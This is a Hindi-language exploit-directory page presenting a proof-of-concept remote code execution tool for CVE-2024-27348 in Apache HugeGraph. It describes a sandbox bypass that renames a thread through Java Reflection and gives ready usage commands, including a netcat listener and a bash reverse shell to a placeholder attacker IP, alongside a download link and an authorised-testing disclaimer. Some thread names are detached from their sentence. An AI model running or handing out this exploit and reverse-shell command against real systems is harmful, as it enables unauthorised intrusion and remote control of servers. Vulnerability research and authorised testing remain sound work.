Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-27348-HugeGraph-RCE — CVE-2024-27348 के लिए उन्नत PoC एक्सप्लॉइट, जो सैंडबॉक्स बाईपास और गैर-अंधा कमांड निष्पादन के माध्यम से Apache HugeGraph में विश्वसनीय RCE प्राप्त करता है। | Kitploit
उपकरण/GitHubGitHub/akelaqe/cve-2024-27348-hugegraph-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubakelaqe/cve-2024-27348-hugegraph-rce

CVE-2024-27348-HugeGraph-RCE

CVE-2024-27348 के लिए उन्नत PoC एक्सप्लॉइट, जो सैंडबॉक्स बाईपास और गैर-अंधा कमांड निष्पादन के माध्यम से Apache HugeGraph में विश्वसनीय RCE प्राप्त करता है।

रिपॉजिटरी देखें
125 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-27348: Apache HugeGraph RCE (उन्नत सैंडबॉक्स बाईपास)

Python 3.x Exploit CVE

CVE-2024-27348 (Apache HugeGraph सर्वर में रिमोट कोड एक्ज़ीक्यूशन) के लिए एक उन्नत, अत्यधिक विश्वसनीय प्रूफ ऑफ कॉन्सेप्ट (PoC) एक्सप्लॉइट।

कई सार्वजनिक PoCs के विपरीत, जो आँख मूंदकर कमांड चलाते हैं या Java के Runtime.exec() की सीमाओं के कारण जटिल पेलोड पर विफल हो जाते हैं, यह स्क्रिप्ट वास्तविक दुनिया के पेनिट्रेशन टेस्टिंग परिदृश्यों में विश्वसनीयता के लिए डिज़ाइन की गई है।

⚠️ अस्वीकरण

केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए। यह टूल सुरक्षा शोधकर्ताओं, पेनिट्रेशन टेस्टर्स और सिस्टम एडमिनिस्ट्रेटरों के लिए प्रदान किया गया है ताकि वे अधिकृत वातावरण में इस भेद्यता को सत्यापित कर सकें। इस टूल के दुरुपयोग या क्षति के लिए लेखक जिम्मेदार नहीं है।

✨ विशेषताएँ और तकनीकी सुधार

यह एक्सप्लॉइट तीन महत्वपूर्ण मुद्दों को संबोधित करके प्रारंभिक सार्वजनिक PoCs से बेहतर है:

  1. HugeGraph सैंडबॉक्स निष्पादन को रोक देता है यदि कॉल करने वाला थ्रेड या नाम का हो। यह पेलोड पेलोड को ट्रिगर करने से पहले Java Reflection का उपयोग करके निष्पादन थ्रेड का नाम गतिशील रूप से में बदल देता है, जिससे सुरक्षा प्रबंधक को सहजता से दरकिनार कर दिया जाता है।
HugeSecurityManager सैंडबॉक्स बाईपास:
gremlin-server-exec-*
task-worker-*
BypassThread
  • जटिल पेलोड हैंडलिंग: Runtime.getRuntime().exec(String) के बजाय, जो जटिल bash कमांड्स (जैसे रिवर्स शेल) को स्पेस पर तोड़ देता है, यह एक्सप्लॉइट उचित रूप से स्वरूपित List<String> के साथ ProcessBuilder का उपयोग करता है। यह कोट्स और रिडायरेक्शन के साथ जटिल पेलोड के सुरक्षित निष्पादन की अनुमति देता है।
  • पूर्ण आउटपुट रीडिंग (नॉन-ब्लाइंड RCE): स्क्रिप्ट Java Scanner का उपयोग करके निष्पादित प्रक्रिया के InputStream को पढ़ती है और JSON HTTP प्रतिक्रिया में कमांड का वास्तविक आउटपुट लौटाती है। आप वही देखते हैं जो सर्वर देखता है।
  • ⚙️ आवश्यकताएँ

    • Python 3.x
    • requests लाइब्रेरी

    आवश्यक निर्भरताएँ स्थापित करें:

    root@kitploit:~
    pip3 install requests
    

    🚀 उपयोग

    root@kitploit:~
    python3 exploit.py -u <TARGET_URL> -c <COMMAND>
    

    उदाहरण

    1. बेसिक कमांड एक्ज़ीक्यूशन (आउटपुट पढ़ना):
    root@kitploit:~
    python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "whoami"
    
    1. रिवर्स शेल स्पॉन करना: चूँकि पेलोड स्पेस और कोट्स को सही ढंग से संभालता है, आप इसे base64-एनकोड या स्टेज किए बिना सीधे एक मानक bash रिवर्स शेल इंजेक्ट कर सकते हैं:
    root@kitploit:~
    # अपनी अटैकर मशीन पर, एक लिसनर शुरू करें:
    nc -lvnp 4444
    
    # एक्सप्लॉइट चलाएँ:
    python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
    

    🔍 भेद्यता विवरण

    Apache HugeGraph सर्वर एक Gremlin API एंडपॉइंट (/gremlin) उजागर करता है जो उपयोगकर्ताओं को Groovy स्क्रिप्ट सबमिट करने की अनुमति देता है। पैच किए जाने से पहले के संस्करणों में अपर्याप्त सैंडबॉक्सिंग के कारण, एक अनधिकृत हमलावर Java Reflection के माध्यम से मनमानी ऑपरेटिंग सिस्टम कमांड निष्पादित कर सकता है।

    टूल डाउनलोड करें